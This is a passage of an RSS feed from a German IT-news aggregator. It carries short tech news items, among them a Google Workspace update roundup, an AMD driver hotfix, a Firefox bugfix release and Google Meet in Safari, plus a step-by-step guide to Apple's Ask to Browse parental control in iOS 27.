| <a href="https://workspaceupdates.googleblog.com/2026/06/google-apps-script-workspace-core-service.html" target="_blank">Learn more</a>.</div><h3>Connect to Google Meet hardware with room codes now in Early Preview</h3><div>Google Meet users can now connect to nearby conference room hardware by entering a 5-character room code on their personal device. Meet recently launched Connect Room using proximity-based detection to identify nearby hardware. | <a href="https://workspaceupdates.googleblog.com/2026/06/room-codes-google-meet-hardware-early-preview.html" target="_blank">Learn more</a>.</div><h3>Updates to Gemini in Google Classroom</h3><div>We are introducing several updates to the Gemini tab in Google Classroom designed to make its tools even more helpful for teachers. These changes make it easier for educators to collaborate with AI and create visual aids from any device, while expanding options for refining lesson plans. | <a href="https://workspaceupdates.googleblog.com/2026/06/updates-to-gemini-in-google-classroom.html" target="_blank">Learn more</a>.</div><h3>Stricter classifications for Google Groups to enhance data security and privacy</h3><div>Earlier this year, we announced changes to Google Groups to enhance data security and privacy. The changes, which are rolling out now. | <a href="https://workspaceupdates.googleblog.com/2026/06/stricter-classifications-for-google-groups-to-enhance-data-security-and-privacy.html" target="_blank">Learn more</a>.</div><h3>Read Along in Google Classroom is now available to all education users to support foundational literacy</h3><div>Read Along in Google Classroom, an AI-powered literacy tool that provides in-the-moment support to students as they read aloud, is now available to all Google Workspace for Education users at no cost. | <a href="https://workspaceupdates.googleblog.com/2026/06/read-along-in-google-classroom-is-now-available-to-all-education-users-to-support-foundational-literacy.html" target="_blank">Learn more</a>.</div><h3>Streamline your data backups with incremental exports for Google Workspace</h3><div>Google Workspace administrators can now utilize incremental exports when backing up organizational data. Instead of re-exporting their entire organization's data, admins can export frequent snapshots of their data into their organization’s own Google Cloud Storage (GCS) bucket. | <a href="https://workspaceupdates.googleblog.com/2026/06/streamline-your-data-backups-with-incremental-exports-for-Google-Workspace.html" target="_blank">Learn more</a>.</div><div><br></div><div><span><i>The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.</i></span></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AMD veröffentlicht neue Treiber für Windows 10 und 11]]></title>
<description><![CDATA[Falls Sie eine Grafikkarte von AMD besitzen, können Sie sich darüber freuen, dass nun neue Treiber für Windows 10 und Windows 11 zum Herunterladen bereitstehen.



Das Update trägt die Bezeichnung „AMD 26.6.3 Hotfix“ und behebt unter anderem ein Problem, das die Radeon RX 7000-Serie und neuere Mo...]]></description>
<link>https://tsecurity.de/de/3627297/it-nachrichten/amd-veroeffentlicht-neue-treiber-fuer-windows-10-und-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627297/it-nachrichten/amd-veroeffentlicht-neue-treiber-fuer-windows-10-und-11/</guid>
<pubDate>Fri, 26 Jun 2026 14:02:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Falls Sie eine Grafikkarte von AMD besitzen, können Sie sich darüber freuen, dass nun neue Treiber für Windows 10 und Windows 11 zum Herunterladen bereitstehen.</p>



<p>Das Update trägt die Bezeichnung „AMD 26.6.3 Hotfix“ und behebt unter anderem ein Problem, das die Radeon RX 7000-Serie und neuere Modelle betrifft. Seit Ende Mai kam es hier zu einem Problem, bei dem aktuelle Treiber fälschlicherweise mit älteren Versionen ersetzt wurden, wie Windowslatest <a href="https://www.windowslatest.com/2023/05/30/windows-11s-microsoft-update-replaces-amd-gpu-drivers-with-older-versions/">berichtet</a>.</p>



<p>Nutzer erhielten daraufhin eine Warnmeldung, da im Grunde zwei Versionen der AMD-Software parallel auf dem System installiert wurden. Das sorgte für Kompatibilitätsprobleme, größere Ausfälle wurden aber nicht bekannt.</p>



<p>Wenn Sie die neuen Treiber herunterladen möchten, können Sie dies über <a href="https://www.amd.com/en/resources/support-articles/release-notes/RN-RAD-WIN-26-6-3-HOTFIX.html" data-type="link" data-id="https://www.amd.com/en/resources/support-articles/release-notes/RN-RAD-WIN-26-6-3-HOTFIX.html">die Support-Seiten von AMD</a> tun. Dort erhalten Sie die Adrenalin Edition 26.6.3 Hotfix Preview für Windows 10 und Windows 11.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Brandneues Fritz-Update steht bereit – diese Geräte erhalten 3 Verbesserungen]]></title>
<description><![CDATA[FRITZ spendiert einigen Repeatern ein neues Update, das nicht nur Fehler behebt, sondern auch praktische Verbesserungen mitbringt.]]></description>
<link>https://tsecurity.de/de/3626569/it-nachrichten/brandneues-fritz-update-steht-bereit-diese-geraete-erhalten-3-verbesserungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626569/it-nachrichten/brandneues-fritz-update-steht-bereit-diese-geraete-erhalten-3-verbesserungen/</guid>
<pubDate>Fri, 26 Jun 2026 09:17:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FRITZ spendiert einigen Repeatern ein neues Update, das nicht nur Fehler behebt, sondern auch praktische Verbesserungen mitbringt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 152.0.3 behebt Speicherproblem beim Start]]></title>
<description><![CDATA[Mozilla hat Firefox 152.0.3 veröffentlicht. Das Update fällt klein aus, behebt aber ein Problem, das für betroffene Nutzer durchaus gravierend sein konnte. Konkret beseitigt Firefox 152.0.3 einen Fehler, der bei installierten Sprachpaketen zu einer extrem hohen Speicherauslastung und zum Einfrier...]]></description>
<link>https://tsecurity.de/de/3625298/it-nachrichten/firefox-15203-behebt-speicherproblem-beim-start/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625298/it-nachrichten/firefox-15203-behebt-speicherproblem-beim-start/</guid>
<pubDate>Thu, 25 Jun 2026 18:34:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mozilla hat Firefox 152.0.3 veröffentlicht. Das Update fällt klein aus, behebt aber ein Problem, das für betroffene Nutzer durchaus gravierend sein konnte. Konkret beseitigt Firefox 152.0.3 einen Fehler, der bei installierten Sprachpaketen zu einer extrem hohen Speicherauslastung und zum Einfrieren...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/firefox-152-0-3-behebt-speicherproblem-beim-start/">Firefox 152.0.3 behebt Speicherproblem beim Start</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Meet: Teilnahme via Safari auf iOS ab sofort möglich]]></title>
<description><![CDATA[Ohne die dedizierte App oder Alternativ-Browser ging bislang nix in Bezug Teilnahme an einem Google-Meet-Call auf dem iPhone oder dem iPad – entweder Google Meet selbst oder eben Gmail. Google ermöglicht neuerdings aber auch den Beitritt zu Videokonferenzen direkt über...Zum Beitrag: Google Meet:...]]></description>
<link>https://tsecurity.de/de/3625289/it-nachrichten/google-meet-teilnahme-via-safari-auf-ios-ab-sofort-moeglich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625289/it-nachrichten/google-meet-teilnahme-via-safari-auf-ios-ab-sofort-moeglich/</guid>
<pubDate>Thu, 25 Jun 2026 18:34:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ohne die dedizierte App oder Alternativ-Browser ging bislang nix in Bezug Teilnahme an einem Google-Meet-Call auf dem iPhone oder dem iPad – entweder Google Meet selbst oder eben Gmail. Google ermöglicht neuerdings aber auch den Beitritt zu Videokonferenzen direkt über...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/google-meet-teilnahme-via-safari-auf-ios-ab-sofort-moeglich/">Google Meet: Teilnahme via Safari auf iOS ab sofort möglich</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Change Your Default Browser on Mac in 2026]]></title>
<description><![CDATA[Key TakeawaysYou can change your default web browser on a Mac in the System Settings under "Desktop & Dock," which determines which app opens when you click web links, such as Safari, Chrome, Firefox, Edge, or others.To set a new default browser, ensure it is installed, then select it from the "D...]]></description>
<link>https://tsecurity.de/de/3623360/it-security-nachrichten/how-to-change-your-default-browser-on-mac-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623360/it-security-nachrichten/how-to-change-your-default-browser-on-mac-in-2026/</guid>
<pubDate>Thu, 25 Jun 2026 07:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key TakeawaysYou can change your default web browser on a Mac in the System Settings under "Desktop &amp; Dock," which determines which app opens when you click web links, such as Safari, Chrome, Firefox, Edge, or others.To set a new default browser, ensure it is installed, then select it from the "Default web browser" dropdown; […]</p>
<p>The post <a href="https://itechhacks.com/change-default-browser-mac/" data-wpel-link="internal">How to Change Your Default Browser on Mac in 2026</a> appeared first on <a href="https://itechhacks.com/" data-wpel-link="internal">iTech Hacks</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s 2026 AI Features Explained: 16 Updates You Need to Know]]></title>
<description><![CDATA[Apple’s 2026 AI features span Siri, accessibility, Safari, Photos, Wallet, and more as Apple Intelligence becomes part of core apps.]]></description>
<link>https://tsecurity.de/de/3622425/it-nachrichten/apples-2026-ai-features-explained-16-updates-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622425/it-nachrichten/apples-2026-ai-features-explained-16-updates-you-need-to-know/</guid>
<pubDate>Wed, 24 Jun 2026 20:33:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple’s 2026 AI features span Siri, accessibility, Safari, Photos, Wallet, and more as Apple Intelligence becomes part of core apps.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Turn On Ask to Browse for Your Kids in iOS 27]]></title>
<description><![CDATA[Apple has introduced Ask to Browse in iOS 27 as part of its expanded parental control features. The new tool gives parents more control over the websites their children visit in Safari. When enabled, a child must request permission before opening a new website, and parents can review and approve ...]]></description>
<link>https://tsecurity.de/de/3622136/ios-mac-os/how-to-turn-on-ask-to-browse-for-your-kids-in-ios-27/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622136/ios-mac-os/how-to-turn-on-ask-to-browse-for-your-kids-in-ios-27/</guid>
<pubDate>Wed, 24 Jun 2026 18:24:42 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has introduced Ask to Browse in iOS 27 as part of its expanded parental control features. The new tool gives parents more control over the websites their children visit in Safari. When enabled, a child must request permission before opening a new website, and parents can review and approve or deny the request directly from their devices. 



This feature works across iPhone, iPad, and Mac and is integrated with Screen Time and Family Sharing. If you want to create a safer browsing experience for your child, here is how to turn on Ask to Browse in iOS 27.



Table of contentsTurn On Ask to Browse Using Family SharingEnable Ask to Browse from Screen TimeManage Approved Websites for Your ChildHow Website Approval Requests WorkFAQsSummaryConclusion



Turn On Ask to Browse Using Family Sharing



Before you can use Ask to Browse, your child must be part of your Family Sharing group and have a Child Account set up.



This method enables website approval requests for your child's Safari browsing activity. When your child attempts to visit a website that has not been approved before, Apple sends a request to the parent through Messages for review.




Open Settings on your iPhone.



Tap your Apple ID profile at the top.



Select Family.



Tap your child's account.



Open Screen Time settings.



Locate Ask to Browse under the parental control options.



Turn on the Ask to Browse toggle.



Confirm any prompts that appear on screen.




Once enabled, your child will need approval before accessing new websites in Safari. Approved sites can be visited again without requiring another request.



Enable Ask to Browse from Screen Time



Apple has redesigned Screen Time in iOS 27, making parental controls easier to access and manage. Ask to Browse is part of this updated experience.




Open Settings.



Tap Screen Time.



Under the Family section, select your child's name.



Review your child's Screen Time settings.



Find Ask to Browse.



Enable the feature.



Verify that notifications are allowed on your device so you can receive website approval requests.




After setup, website requests will appear in Messages, allowing you to approve or deny access quickly.



Manage Approved Websites for Your Child



Parents can build a list of approved websites and control what children can access online. Apple also blocks known adult websites by default for child accounts.




Open Settings.



Go to Screen Time.



Select your child's account.



Open website and browsing controls.



Review previously approved websites.



Add trusted websites if needed.



Remove websites that should no longer be accessible.




This allows you to customize your child's browsing experience according to their age and needs.



How Website Approval Requests Work



Understanding how the approval process works helps parents manage requests more efficiently.




Your child enters a website address in Safari.



Safari checks whether the website has already been approved.



If it is a new site, a permission request is generated.



The request appears in the parent's Messages app.



The parent reviews the website.



The parent chooses Approve or Deny.



The child receives the decision immediately.




This process is designed to give parents visibility into new websites before children access them.



FAQs



What is Ask to Browse in iOS 27? Ask to Browse is a new parental control feature that requires children to get permission before visiting new websites in Safari. It extends the idea behind Apple's Ask to Buy feature for apps and purchases.  Does Ask to Browse work on iPad and Mac? Yes. Apple says the feature works across iPhone, iPad, and Mac when using Safari.  Do parents receive website requests in Messages? Yes. Website access requests appear through the Messages app, where parents can approve or deny them.  Is Ask to Browse enabled by default? For younger child accounts, Apple enables stronger protections by default. Parents can also choose to enable Ask to Browse for older children and teens.  Does Ask to Browse block adult websites? Yes. Apple automatically blocks known adult websites for child accounts and provides additional website management tools for parents.  



Summary




Ask to Browse is a new Safari parental control feature in iOS 27.



Children must request permission before visiting new websites.



Parents receive approval requests through Messages.



The feature can be managed through Family Sharing and Screen Time.



Approved websites remain accessible after approval.



Known adult websites are blocked automatically for child accounts.



The feature works across iPhone, iPad, and Mac.




Conclusion



Ask to Browse gives parents a practical way to supervise web access without completely restricting internet use. By enabling the feature in iOS 27, you can review new websites before your child visits them, manage approved sites, and create a safer browsing environment across Apple devices. Combined with the redesigned Screen Time experience, it becomes much easier to stay informed about your child's online activity while still giving them room to explore age-appropriate content.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,97ms -->